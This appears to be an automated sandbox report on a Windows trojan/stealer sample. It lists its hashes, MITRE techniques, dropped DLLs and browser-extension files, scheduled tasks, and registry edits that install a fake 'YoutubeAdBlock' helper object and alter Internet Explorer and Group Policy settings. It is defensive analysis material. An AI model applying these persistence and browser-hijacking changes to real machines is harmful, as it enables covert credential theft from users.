6495e9cc59844c804022b026aff88b0afaaafe6a23702231eaee3e1d74d448ef

Analysis

max time kernel
99s
max time network
124s
platform
windows7_x64
resource
win7v20210410
submitted
21-06-2021 07:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

044dddee4308c73a3d6d7cb710f209d4.exe
Size

6.2MB
MD5

044dddee4308c73a3d6d7cb710f209d4
SHA1

875f991fb85660b34f738d76da5a28e3c26ff62b
SHA256

6495e9cc59844c804022b026aff88b0afaaafe6a23702231eaee3e1d74d448ef
SHA512

d4fdfcb2b7401836c4e8600372c129d2d556d57f3ec5463d44f646fa7ebf236370c6bb71fa0bd0131f0ade4dedd10528f53ba541db4ec82b46d1ad36b7d2277a

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

9 1572 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeWlwqqkB.exebJTzvxo.exewZJPSyw.exe

pid process

1208 SimplInst.exe
1280 SimplInst.exe
864 WlwqqkB.exe
1400 bJTzvxo.exe
1644 wZJPSyw.exe

flow	pid	process
9	1572	rundll32.exe

pid	process
1208	SimplInst.exe
1280	SimplInst.exe
864	WlwqqkB.exe
1400	bJTzvxo.exe
1644	wZJPSyw.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 13 IoCs

Processes:

044dddee4308c73a3d6d7cb710f209d4.exeSimplInst.exeSimplInst.exerundll32.exe

pid	process
1656	044dddee4308c73a3d6d7cb710f209d4.exe
1208	SimplInst.exe
1208	SimplInst.exe
1208	SimplInst.exe
1208	SimplInst.exe
1208	SimplInst.exe
1280	SimplInst.exe
1280	SimplInst.exe
1280	SimplInst.exe
1572	rundll32.exe
1572	rundll32.exe
1572	rundll32.exe
1572	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Drops file in System32 directory 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeWlwqqkB.exepowershell.EXEpowershell.exerundll32.exeSimplInst.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	WlwqqkB.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	WlwqqkB.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

bJTzvxo.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lv\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ru\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sk\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\Z29V4M.dll	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bn\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\bpgEkhk.xml	bJTzvxo.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\VlTzTAz.xml	bJTzvxo.exe
File created	C:\Program Files (x86)\fcsvEsvhbcUn\wAeaGBy.dll	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hu\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\id\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ms\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\da\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\gu\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sr\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sw\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\vi\messages.json	bJTzvxo.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ar\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sq\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\he\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hi\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lt\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\te\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\anjFGKdzU\WYUqqKj.xml	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\icon16.ico	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\background.html	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fil\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\MbhkjjT.xml	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bg\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\tr\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\ktTXGKPDP.dll	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ko\messages.json	bJTzvxo.exe
File opened for modification	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	bJTzvxo.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\AnOJGlw.dll	bJTzvxo.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\am\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\uk\messages.json	bJTzvxo.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\et\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\no\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hr\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\anjFGKdzU\fIAhcy.dll	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\de\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fr\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fa\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_CN\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mr\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ro\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ta\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_PT\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\gSrrWGk.dll	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\it\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\kn\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	bJTzvxo.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\AfMIcAahAcqyN.dll	bJTzvxo.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
632	schtasks.exe
880	schtasks.exe
524	schtasks.exe
1796	schtasks.exe
784	schtasks.exe
1896	schtasks.exe
1360	schtasks.exe
936	schtasks.exe
1996	schtasks.exe
1996	schtasks.exe
760	schtasks.exe
692	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

Processes:

bJTzvxo.exewZJPSyw.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Approved Extensions	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	wZJPSyw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	wZJPSyw.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MAIN	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights	bJTzvxo.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd3495402b442020b9103ecd92874870e	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "joihglJ.exe"	bJTzvxo.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	bJTzvxo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "joihglJ.exe"	bJTzvxo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	bJTzvxo.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\joihglJ.exe = "9999"	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	bJTzvxo.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	bJTzvxo.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	bJTzvxo.exe

Modifies data under HKEY_USERS 40 IoCs

Processes:

WlwqqkB.exepowershell.exewscript.exebJTzvxo.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	WlwqqkB.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000e0daaf316b66d701	WlwqqkB.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	bJTzvxo.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070021000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\62-61-be-3d-df-c5	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WlwqqkB.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	bJTzvxo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = e060d44a6b66d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-61-be-3d-df-c5\WpadDecisionReason = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WlwqqkB.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	bJTzvxo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-61-be-3d-df-c5\WpadDecisionTime = e060d44a6b66d701	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 002b03326b66d701	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WlwqqkB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-61-be-3d-df-c5	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-61-be-3d-df-c5\WpadDecision = "0"	rundll32.exe

Modifies registry class 64 IoCs

Processes:

bJTzvxo.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	bJTzvxo.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	bJTzvxo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	bJTzvxo.exe
